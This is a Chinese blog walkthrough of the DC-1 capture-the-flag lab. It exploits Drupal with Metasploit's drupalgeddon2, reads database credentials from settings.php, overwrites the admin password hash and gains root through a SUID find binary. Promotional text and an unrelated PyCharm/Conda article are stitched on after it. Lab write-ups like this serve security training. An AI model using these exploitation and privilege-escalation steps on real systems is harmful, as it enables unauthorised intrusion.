vuln靶场——DC-1



![](https://img-blog.csdnimg.cn/img_convert/461fb22932d92299a87b5a99ac7d6bc7.png)


#### 进入MSF控制台搜索drupal模块



msfconsole
search drupal



![](https://img-blog.csdnimg.cn/img_convert/8c5fac33613246fbe4103689a47a864d.png)


#### 选择模块进行测试


使用2018的测试



use exploit/unix/webapp/drupal_drupalgeddon2



![](https://img-blog.csdnimg.cn/img_convert/c87bcd15736b94a073f7a5776093845c.png)


设置靶机IP运行msf



set rhosts 192.168.178.108

run



![](https://img-blog.csdnimg.cn/img_convert/6872765fc82bbaa4f8f65bd336d10359.png)


成功获取权限



![](https://img-blog.csdnimg.cn/img_convert/9a28c6f32ef5ca0a745a9aa0ac195587.png)


#### 进入shell


输入id,



shell
id


执行`whoami`,查询当前用户的身份信息



whoami



![](https://img-blog.csdnimg.cn/img_convert/def31992cb6f2e7017d3b0d51023a49b.png)


发现是www-data用户权限


##### 发现flag4.txt文件


进入home目录,发现flag4.txt文件,提示需要提升权限



![](https://img-blog.csdnimg.cn/img_convert/c2b8bc5b448b86d7b83ea9ea841ada38.png)


##### 使用python反弹一个交互式shell



python -c “import pty;pty.spawn(‘/bin/bash’)”


将当前的shell提升一个交互式的shell,以便执行更多的命令和操作。



![](https://img-blog.csdnimg.cn/img_convert/33a2196dcdd267a6c4fd5774e1395fee.png)


##### 进入到www目录,发现flag1文件


查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件



cd /var/www/
ls
cat flag1.txt



![](https://img-blog.csdnimg.cn/img_convert/80a2f04f59f8104bb66e4148cbefcd78.png)


##### 发现flag2


Drupal的默认配置文件



![](https://img-blog.csdnimg.cn/img_convert/7f3859ec4bb38a962aaa858d233cd106.png)


[Drupal 默认安装的目录结构-腾讯云开发者社区-腾讯云](https://bbs.csdn.net/topics/618653875)



/var/www/sites/default/settings.php


查看文件内容



cat /var/www/sites/default/settings.php


发现了flag2和数据库的账号密码


 flag2提示,提升权限为root来查看敏感文件,或者直接爆破


![](https://img-blog.csdnimg.cn/img_convert/ae373e7d9114a513b4566867277dddb3.png)



![](https://img-blog.csdnimg.cn/img_convert/ca139460e3f40bf911dd8a195aea8fa7.png)



数据库:drupaldb
帐号:dbuser
密码:R0ck3t


我们先进入数据库查看



mysql -u dbuser -p



![](https://img-blog.csdnimg.cn/img_convert/ad9bf37563673105cc400a2a4344f173.png)


查看数据库,切换到drupaldb数据库,查看查找默认的`users` 表



show databases;
use drupaldb;
select * from users;


发现admin信息



![](https://img-blog.csdnimg.cn/img_convert/62d574296605ec771328391e61af50d1.png)



> 
> 置换drupal密码(两种方法)
> 
> 
> [https://www.cnblogs.com/wicub/p/3582637.html](https://bbs.csdn.net/topics/618653875)
> 
> 
> [drupal mysql hash密码\_【Drupal】如何重置Drupal 7的用户密码-CSDN博客](https://bbs.csdn.net/topics/618653875)
> 
> 
> 



![](https://img-blog.csdnimg.cn/img_convert/4dd6b859418699e6b3c23bd5f7f1b716.png)


进入www目录,站点路径下执行脚本,生成新密码



quit;
cd /var/www/
php scripts/password-hash.sh 新密码



![](https://img-blog.csdnimg.cn/img_convert/93a4e9309bb2429919a615f7ea07b628.png)



S S SD6KBbrqTHP5u/1bXnH4YfYPUMnI4E3JfEjNw6Du86.rEBzXQ/qcP


然后在进入数据库中把密码字段进行替换  
 进入mysql,输入密码,切换到drupaldb数据库,将pass字段进行替换



mysql -u dbuser -p
R0ck3t
use drupaldb
update users set pass=“ S S SD6KBbrqTHP5u/1bXnH4YfYPUMnI4E3JfEjNw6Du86.rEBzXQ/qcP” where name=“admin”;



![](https://img-blog.csdnimg.cn/img_convert/70233eac4235d9558154b6809cf91102.png)


#### 登录站点



http://192.168.178.108/



![](https://img-blog.csdnimg.cn/img_convert/fb6f9b28ee73b26c16787c0923e37e25.png)


进行登录,密码是之前我们自己替换的



admin
123456


成功登录



![](https://img-blog.csdnimg.cn/img_convert/d42f5c1812dd2eb19886ede2d93b06fd.png)


##### 发现flag3


登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3



![](https://img-blog.csdnimg.cn/img_convert/1f6e183872ba2a7bc897437fcdc71875.png)


点击flag3进入,发现提示信息



![](https://img-blog.csdnimg.cn/img_convert/b1f5b6cbf263bce4daac86c75317ec71.png)


先`quit;`退出数据库,然后使用命令查看 `suid` 权限的可执行二进制程序


#### find提权


[https://www.cnblogs.com/aaak/p/15718561.html](https://bbs.csdn.net/topics/618653875)



![](https://img-blog.csdnimg.cn/img_convert/b5ddf1f1e6c5270099a2cf29e48d0132.png)



ls -l /usr/bin/find



![](https://img-blog.csdnimg.cn/img_convert/28fc29f249ece147dfe65ace73c21eec.png)



find / -perm -4000 2>/dev/null



![](https://img-blog.csdnimg.cn/img_convert/bfe8fc1b3757c11540ca831ef81ea21b.png)


使用命令测试,发现为root权限



touch 666 (创建一个为666的空文件夹)
ls
find / -name 666 -exec “whoami” ;

find (一个路径或文件必须存在) -exec 执行命令 (结束);
find /usr/bin/find -exec “whoami” ;



![](https://img-blog.csdnimg.cn/img_convert/c1a090f98d76cef9e07fe4a9d04a953d.png)


我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录



find / -name 666 -exec “/bin/sh” ;
whoami
ls
cd /root
ls



![](https://img-blog.csdnimg.cn/img_convert/9666700f3b7a5f1582de4578fa3d7621.png)


查看`thefinalflag.txt`文件



## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/2d477e7ecb2b91a960fb496d63ff826c.png)

![img](https://img-blog.csdnimg.cn/img_convert/653743a74b9383587329376af0e7a77f.png)

![img](https://img-blog.csdnimg.cn/img_convert/d6a575144c6de2b97ff03b4b261ac25a.png)

![img](https://img-blog.csdnimg.cn/img_convert/e65fa7642fd9cb234e6acfaf910724a0.png)

![img](https://img-blog.csdnimg.cn/img_convert/fef111c19ac447b92eaedeaa7452097c.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

q7HG1-1715545380547)]

[外链图片转存中...(img-FAW4plHJ-1715545380547)]

[外链图片转存中...(img-co54VBeK-1715545380547)]

[外链图片转存中...(img-LCs3b0I6-1715545380547)]

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

### 解决PyCharm无法加载Conda虚拟环境的方法 #### 配置设置 为了使 PyCharm 能够成功识别并使用 Conda 创建的虚拟环境,需确保 Anaconda 的路径已正确添加至系统的环境变量中[^1]。这一步骤至关重要,因为只有当 Python 解释器及其关联工具被加入 PATH 后,IDE 才能顺利找到它们。 对于 Windows 用户而言,在安装 Anaconda 时,默认情况下会询问是否将它添加到系统路径里;如果当时选择了否,则现在应该手动完成此操作。具体做法是在“高级系统设置”的“环境变量”选项内编辑 `Path` 变量,追加 Anaconda 安装目录下的 Scripts 文件夹位置。 另外,建议每次新建项目前都通过命令行先激活目标 conda env: ```bash conda activate myenvname ``` 接着再启动 IDE 进入工作区,这样有助于减少兼容性方面的问题发生概率。 #### 常见错误及修复方法 ##### 错误一:未发现任何解释器 症状表现为打开 PyCharm 新建工程向导页面找不到由 Conda 构建出来的 interpreter 列表项。此时应前往 Preferences/Settings -> Project:...->Python Interpreter 下方点击齿轮图标选择 Add...按钮来指定自定义的位置。按照提示浏览定位到对应版本 python.exe 的绝对地址即可解决问题。 ##### 错误二:权限不足导致 DLL 加载失败 有时即使指定了正确的解释器路径,仍可能遇到由于缺乏适当的操作系统级许可而引发的功能缺失现象。特别是涉及到调用某些特定类型的动态链接库 (Dynamic Link Library, .dll) 时尤为明显。因此拥有管理员身份执行相关动作显得尤为重要——无论是从终端还是图形界面触发创建新 venv 流程均如此处理能够有效规避此类隐患。 ##### 错误三:网络连接异常引起依赖下载超时 部分开发者反馈过因网速慢或者其他因素造成 pip install 操作中途断开进而影响整个项目的初始化进度条卡住的情况。对此可尝试调整镜像源加速获取速度或是离线模式预先准备好所需资源包后再继续后续步骤。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值